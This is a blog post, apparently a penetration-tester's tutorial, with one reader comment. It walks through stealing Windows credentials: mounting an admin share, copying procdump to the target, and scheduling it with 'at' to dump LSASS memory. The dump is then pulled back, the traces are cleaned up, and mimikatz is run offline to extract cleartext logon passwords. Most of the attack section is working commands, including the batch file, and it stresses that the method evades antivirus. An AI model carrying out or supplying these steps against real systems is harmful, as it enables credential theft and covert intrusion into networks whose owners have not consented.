Using mimikatz Alpha or getting clear text passwords with a Microsoft Tool

Mimikatz is now built into Metasploit's Meterpreter; you can run "load mimikatz" from the meterpreter prompt. But if you don't want the hassle of dealing with AV, reverse or bind payloads and Meterpreter binaries, and you already have clear text credentials for an admin, you can use mimikatz's alpha release, which lets you run mimikatz on your own machine against a process memory dump of LSASS taken on the target. The great thing about this technique is that the only thing that ever touches disk on the target is a signed Microsoft tool (Sysinternals procdump).

Mimikatz minidump:

http://blog.gentilkiwi.com/securite/mimikatz/minidump

Procdump:

http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

Let's start. First we make sure our authentication works against the box and that we can list the contents of the C$ admin share (by default only administrators can):

net use \\TARGETBOX\C$ /user:DOMAIN\serviceaccount serviceaccount123
dir \\TARGETBOX\C$

If that works, we check that we can call the "at" command on the remote host (this needs admin rights and the Schedule service running on the target; with no jobs queued it just reports that the list is empty):

at \\TARGETBOX

All set. Next let's prep our workspace on the remote host. We are using the C:\Temp directory.

mkdir \\TARGETBOX\C$\Temp
dir \\TARGETBOX\C$\Temp
copy c:\temp\procdump.exe \\TARGETBOX\C$\Temp\
copy c:\temp\procdump.bat \\TARGETBOX\C$\Temp\

The contents of procdump.bat are:

@echo off
C:\Temp\procdump.exe -accepteula -ma lsass.exe C:\Temp\%COMPUTERNAME%_lsass.dmp

Give the dump a full path: a job started by at runs with the scheduler's default working directory (%SystemRoot%\System32), so a bare filename would land there instead of in C:\Temp, where the cleanup step below looks for it. The -accepteula switch matters too; without it procdump would block on the EULA dialog in a session nobody is looking at.

I'm using the computer name in the memory dump's file name to help me keep track of where each dump came from, and also to notice when I've dumped more than one IP that is actually the same host.

Next we schedule the task. Use "net time" to determine the local time on the remote machine (the at job is scheduled against the target's clock, not yours), then pick a time a minute or two ahead of it:

net time \\TARGETBOX
at \\TARGETBOX 13:52 C:\Temp\procdump.bat

Pull down the file and clean up:

dir \\TARGETBOX\C$\Temp
copy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\
rmdir /s \\TARGETBOX\C$\Temp

On your side the only thing you need to make sure of is that you run mimikatz on a machine with a matching Windows version and architecture (x86 or x64) to the host you pulled the dump from; the LSASS structures differ between versions and bitness, so a mismatch parses nothing useful. Use the following matrix for reference: http://blog.gentilkiwi.com/wp-content/uploads/2013/04/minidump_matrix.png

Load up the alpha version of mimikatz, switch it to minidump mode and you're dumping creds:

mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full

 

That's it. Password dumping without ever running a "hacker" tool on the target. Much love to Microsoft, and even more to mimikatz's creator
@gentilkiwi (Benjamin Delpy), both for this alpha release and for changing his licensing to allow mimikatz code to be integrated into Meterpreter.

Rob Fuller

Reader comments (1)

You can even create a minidump via a PowerShell script =)

https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Funny that the example given is the LSASS process
